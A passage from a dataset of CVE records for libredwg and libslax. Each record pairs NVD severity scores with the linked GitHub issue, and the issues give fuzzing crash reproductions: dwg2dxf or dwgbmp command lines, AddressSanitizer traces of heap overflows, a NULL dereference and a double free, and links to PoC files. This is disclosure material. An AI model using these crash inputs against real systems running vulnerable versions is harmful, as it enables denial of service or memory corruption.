00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==15425==ABORTING ``` ## POC [heap-buffer-overflow-bit_wcs2len-bits-1634.zip](https://github.com/LibreDWG/libredwg/files/5006918/heap-buffer-overflow-bit_wcs2len-bits-1634.zip)
A heap buffer overflow in bit_wcs2len at bits.c:1634
https://api.github.com/repos/LibreDWG/libredwg/issues/255/comments
1
2020-07-31T12:13:06Z
2020-08-01T09:34:29Z
https://github.com/LibreDWG/libredwg/issues/255
669,753,229
255
2,545
CVE-2021-39523
2021-09-20T16:15:11.947
An issue was discovered in libredwg through v0.10.1.3751. A NULL pointer dereference exists in the function check_POLYLINE_handles() located in decode.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/251" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/251" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/251
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info: Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwg2dxf (latest master [aee0ea](https://github.com/LibreDWG/libredwg/commit/aee0ea1f52ef9603b981362c83b3fec324ebb199)) ## Command line ./programs/dwg2dxf -b -m ./SEGV-check_POLYLINE_handles-decode-5110 -o /dev/null ## Output ``` Reading DWG file ./crashes/SEGV-check_POLYLINE_handles-decode-5110 Warning: checksum: 0x28751255 (calculated) mismatch ERROR: Invalid EED size 59410 > 5 ERROR: bit_read_RC buffer overflow at 11 ERROR: bit_read_RC buffer overflow at 11 Warning: check_CRC mismatch 4410-4424 = 14: D8BC <=> C37B Warning: Unstable Class object 504 TABLESTYLE (0xfff) 42/0 Warning: TODO TABLESTYLE r2010+ missing fields Warning: Unstable Class object 505 MATERIAL (0x481) 45/0 Warning: Unstable Class object 505 MATERIAL (0x481) 46/0 Warning: Unstable Class object 505 MATERIAL (0x481) 47/0 ERROR: Invalid object handle 0.0.0 at pos @2.2 ERROR: bit_read_RC buffer overflow at 54 ERROR: bit_read_RC buffer overflow at 54 ERROR: bit_read_RC buffer overflow at 54 ERROR: bit_read_RC buffer overflow at 54 ERROR: bit_read_RC buffer overflow at 54 Warning: Wrong POLYLINE.layer 0 Warning: POLYLINE.layer is vertex[0] 10, shift em, NULL seqend Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==31426==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55638c2df408 bp 0x000000000004 sp 0x7ffd7da9bd40 T0) #0 0x55638c2df407 in check_POLYLINE_handles /home/seviezhou/libredwg/src/decode.c:5110 #1 0x55638cd140de in dwg_decode_add_object /home/seviezhou/libredwg/src/decode.c:5514 #2 0x55638cd20d90 in read_2004_section_handles /home/seviezhou/libredwg/src/decode.c:2835 #3 0x55638cd20d90 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3671 #4 0x55638cd2f3db in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #5 0x55638cc2a1fc in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #6 0x55638cc27594 in main /home/seviezhou/libredwg/programs/dwg2dxf.c:258 #7 0x7f8cf6f20b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55638cc28689 in _start (/home/seviezhou/libredwg/programs/dwg2dxf+0xa4b689) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/libredwg/src/decode.c:5110 check_POLYLINE_handles ==31426==ABORTING ``` ## POC [SEGV-check_POLYLINE_handles-decode-5110.zip](https://github.com/LibreDWG/libredwg/files/5006038/SEGV-check_POLYLINE_handles-decode-5110.zip)
A Segmentation fault error in check_POLYLINE_handles at decode.c:5110
https://api.github.com/repos/LibreDWG/libredwg/issues/251/comments
0
2020-07-31T08:53:01Z
2020-08-01T09:34:28Z
https://github.com/LibreDWG/libredwg/issues/251
669,581,382
251
2,546
CVE-2021-39525
2021-09-20T16:15:11.990
An issue was discovered in libredwg through v0.10.1.3751. bit_read_fixed() in bits.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/261" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/261" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/261
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwg2dxf (latest master [39ef943](https://github.com/LibreDWG/libredwg/commit/39ef9439f35111170258cf57cc0c58eabc4748c7)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwg2dxf -b -m ./SEGV-check_POLYLINE_handles-decode-5110 -o /dev/null ## AddressSanitizer output ``` ================================================================= ==65289==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62c0000381ff at pc 0x7fc1be68a945 bp 0x7fff3419f990 sp 0x7fff3419f138 READ of size 6 at 0x62c0000381ff thread T0 #0 0x7fc1be68a944 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c944) #1 0x5588916f116f in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x5588916f116f in bit_read_fixed /home/seviezhou/libredwg/src/bits.c:1424 #3 0x558891715678 in acds_private /home/seviezhou/libredwg/src/acds.spec:111 #4 0x5588917b3161 in read_2004_section_acds /home/seviezhou/libredwg/src/decode.c:3437 #5 0x5588917b3161 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3694 #6 0x5588917bf646 in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #7 0x5588916b89fc in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #8 0x5588916b5e12 in main /home/seviezhou/libredwg/programs/dwg2dxf.c:258 #9 0x7fc1bde90b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x5588916b6d69 in _start (/home/seviezhou/libredwg/programs/dwg2dxf+0xa88d69) 0x62c0000381ff is located 1 bytes to the left of 29696-byte region [0x62c000038200,0x62c00003f600) allocated by thread T0 here: #0 0x7fc1be6967aa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987aa) #1 0x5588917211c4 in read_2004_compressed_section /home/seviezhou/libredwg/src/decode.c:2432 #2 0x5588922c13aa (/home/seviezhou/libredwg/programs/dwg2dxf+0x16933aa) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c587fffefe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587fffeff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c587ffff020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c587ffff030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c587ffff040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c587ffff080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==65289==ABORTING ``` ## POC [heap-overflow-bit_read_fixed-bits-1424.zip](https://github.com/LibreDWG/libredwg/files/5011661/heap-overflow-bit_read_fixed-bits-1424.zip)
A heap overflow in bits.c:1424
https://api.github.com/repos/LibreDWG/libredwg/issues/261/comments
1
2020-08-02T04:51:37Z
2020-08-02T12:15:30Z
https://github.com/LibreDWG/libredwg/issues/261
671,508,299
261
2,547
CVE-2021-39527
2021-09-20T16:15:12.037
An issue was discovered in libredwg through v0.10.1.3751. appinfo_private() in decode.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/252" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/252" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/252
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info: Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwg2dxf (latest master [aee0ea](https://github.com/LibreDWG/libredwg/commit/aee0ea1f52ef9603b981362c83b3fec324ebb199)) ## Command line ./programs/dwg2dxf -b -m ./heap-buffer-overflow-appinfo_private-decode-2993 -o /dev/null ## AddressSanitizer output ``` Reading DWG file ./heap-buffer-overflow-appinfo_private-decode-2993 ================================================================= ==50338==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000c436 at pc 0x7f19fcaa3676 bp 0x7ffc0845d750 sp 0x7ffc0845cef8 READ of size 12 at 0x60200000c436 thread T0 #0 0x7f19fcaa3675 in __interceptor_memcmp (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x77675) #1 0x56136d532338 in appinfo_private /home/seviezhou/libredwg/src/decode.c:2993 #2 0x56136d532338 in read_2004_section_appinfo /home/seviezhou/libredwg/src/decode.c:3023 #3 0x56136d532338 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3675 #4 0x56136d53e3db in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #5 0x56136d4391fc in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #6 0x56136d436594 in main /home/seviezhou/libredwg/programs/dwg2dxf.c:258 #7 0x7f19fc2beb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x56136d437689 in _start (/home/seviezhou/libredwg/programs/dwg2dxf+0xa4b689) 0x60200000c436 is located 0 bytes to the right of 6-byte region [0x60200000c430,0x60200000c436) allocated by thread T0 here: #0 0x7f19fcac4612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x56136d47a234 in bit_read_TU16 /home/seviezhou/libredwg/src/bits.c:1878 #2 0x29d (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __interceptor_memcmp Shadow bytes around the buggy address: 0x0c047fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff9880: fa fa fa fa fa fa[06]fa fa fa 04 fa fa fa 00 fa 0x0c047fff9890: fa fa 00 fa fa fa 00 fa fa fa 04 fa fa fa 00 fa 0x0c047fff98a0: fa fa 04 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff98b0: fa fa 02 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff98c0: fa fa 00 fa fa fa 00 06 fa fa 00 fa fa fa 00 fa 0x0c047fff98d0: fa fa 00 fa fa fa 00 fa fa fa 00 00 fa fa 00 02 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==50338==ABORTING ``` ## POC [heap-buffer-overflow-appinfo_private-decode-2993.zip](https://github.com/LibreDWG/libredwg/files/5006069/heap-buffer-overflow-appinfo_private-decode-2993.zip)
A heap buffer overflow in appinfo_private at decode.c:2993
https://api.github.com/repos/LibreDWG/libredwg/issues/252/comments
0
2020-07-31T08:58:03Z
2020-08-01T09:34:29Z
https://github.com/LibreDWG/libredwg/issues/252
669,586,008
252
2,548
CVE-2021-39528
2021-09-20T16:15:12.077
An issue was discovered in libredwg through v0.10.1.3751. dwg_free_MATERIAL_private() in dwg.spec has a double free.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/256" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/256" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/LibreDWG/libredwg/issues/256
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwgbmp (latest master [4b99ed](https://github.com/LibreDWG/libredwg/commit/4b99edb0ea26e99ef65c5fe68670e6b1f9382d44)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwgbmp ./double-free-dwg_free_MATERIAL_private-dwg.spec-7662 /tmp/a.bmp ## AddressSanitizer output ``` ================================================================= ==29185==ERROR: AddressSanitizer: attempting double-free on 0x60c00000b140 in thread T0: #0 0x7ff7ab4c22da in free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982da) #1 0x55bd65d40854 in dwg_free_MATERIAL_private /home/seviezhou/libredwg/src/dwg.spec:7662 #2 0x55bd65dec9d4 in dwg_free_MATERIAL /home/seviezhou/libredwg/src/dwg.spec:7640 #3 0x55bd65e6c14e in dwg_free_object /home/seviezhou/libredwg/src/free.c:862 #4 0x55bd65e736fc in dwg_free /home/seviezhou/libredwg/src/free.c:1266 #5 0x55bd65b897d7 in bmp_free_dwg /home/seviezhou/libredwg/programs/dwgbmp.c:95 #6 0x55bd65b89e1b in get_bmp /home/seviezhou/libredwg/programs/dwgbmp.c:133 #7 0x55bd65b88bca in main /home/seviezhou/libredwg/programs/dwgbmp.c:301 #8 0x7ff7aacbcb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55bd65b893e9 in _start (/home/seviezhou/libredwg/programs/dwgbmp+0x4e23e9) 0x60c00000b140 is located 0 bytes inside of 128-byte region [0x60c00000b140,0x60c00000b1c0) freed by thread T0 here: #0 0x7ff7ab4c22da in free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982da) #1 0x55bd657f449b in dwg_decode_MATERIAL_private /home/seviezhou/libredwg/src/dwg.spec:7665 #2 0xb4 (<unknown module>) previously allocated by thread T0 here: #0 0x7ff7ab4c27aa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987aa) #1 0x55bd657f2777 in dwg_decode_MATERIAL_private /home/seviezhou/libredwg/src/dwg.spec:7662 #2 0xb4 (<unknown module>) SUMMARY: AddressSanitizer: double-free ??:0 free ==29185==ABORTING ``` ## POC [double-free-dwg_free_MATERIAL_private-dwg.spec-7662.zip](https://github.com/LibreDWG/libredwg/files/5010391/double-free-dwg_free_MATERIAL_private-dwg.spec-7662.zip)
A double free in dwg.spec:7662
https://api.github.com/repos/LibreDWG/libredwg/issues/256/comments
1
2020-08-01T12:56:26Z
2020-08-01T21:07:33Z
https://github.com/LibreDWG/libredwg/issues/256
670,848,928
256
2,549
CVE-2021-39530
2021-09-20T16:15:12.163
An issue was discovered in libredwg through v0.10.1.3751. bit_wcs2nlen() in bits.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/258" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/258" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/258
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwgbmp (latest master [39ef943](https://github.com/LibreDWG/libredwg/commit/39ef9439f35111170258cf57cc0c58eabc4748c7)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwgbmp ./heap-overflow-bit_wcs2nlen-bit-1636 ## AddressSanitizer output ``` ================================================================= ==23940==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000ec80 at pc 0x558b22fdc723 bp 0x7ffe585f6d40 sp 0x7ffe585f6d30 READ of size 2 at 0x61600000ec80 thread T0 #0 0x558b22fdc722 in bit_wcs2nlen /home/seviezhou/libredwg/src/bits.c:1636 #1 0x558b22c13540 in dwg_decode_LTYPE_private /home/seviezhou/libredwg/src/dwg.spec:3020 #2 0x558b2308fb8d in dwg_decode_LTYPE /home/seviezhou/libredwg/src/dwg.spec:2936 #3 0x558b2308fb8d in dwg_decode_add_object /home/seviezhou/libredwg/src/decode.c:5669 #4 0x558b23097a03 in read_2004_section_handles /home/seviezhou/libredwg/src/decode.c:2843 #5 0x558b23097a03 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3680 #6 0x558b230a5a36 in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #7 0x558b22f9edec in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #8 0x558b22f9ce28 in get_bmp /home/seviezhou/libredwg/programs/dwgbmp.c:120 #9 0x558b22f9bed0 in main /home/seviezhou/libredwg/programs/dwgbmp.c:301 #10 0x7f0a4446eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x558b22f9c6a9 in _start (/home/seviezhou/libredwg/programs/dwgbmp+0x4e76a9) 0x61600000ec81 is located 0 bytes to the right of 513-byte region [0x61600000ea80,0x61600000ec81) allocated by thread T0 here: #0 0x7f0a44c747aa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987aa) #1 0x558b22fd7de8 in bit_read_TF /home/seviezhou/libredwg/src/bits.c:1444 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libredwg/src/bits.c:1636 bit_wcs2nlen Shadow bytes around the buggy address: 0x0c2c7fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff9d90:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==23940==ABORTING ``` ## POC [heap-overflow-bit_wcs2nlen-bit-1636.zip](https://github.com/LibreDWG/libredwg/files/5011540/heap-overflow-bit_wcs2nlen-bit-1636.zip)
Heap overflow due to incomplete fix for issues #255
https://api.github.com/repos/LibreDWG/libredwg/issues/258/comments
0
2020-08-02T02:25:59Z
2020-08-02T12:15:29Z
https://github.com/LibreDWG/libredwg/issues/258
671,412,127
258
2,550
CVE-2021-39531
2021-09-20T16:15:12.210
An issue was discovered in libslax through v0.22.1. slaxLexer() in slaxlexer.c has a stack-based buffer overflow.
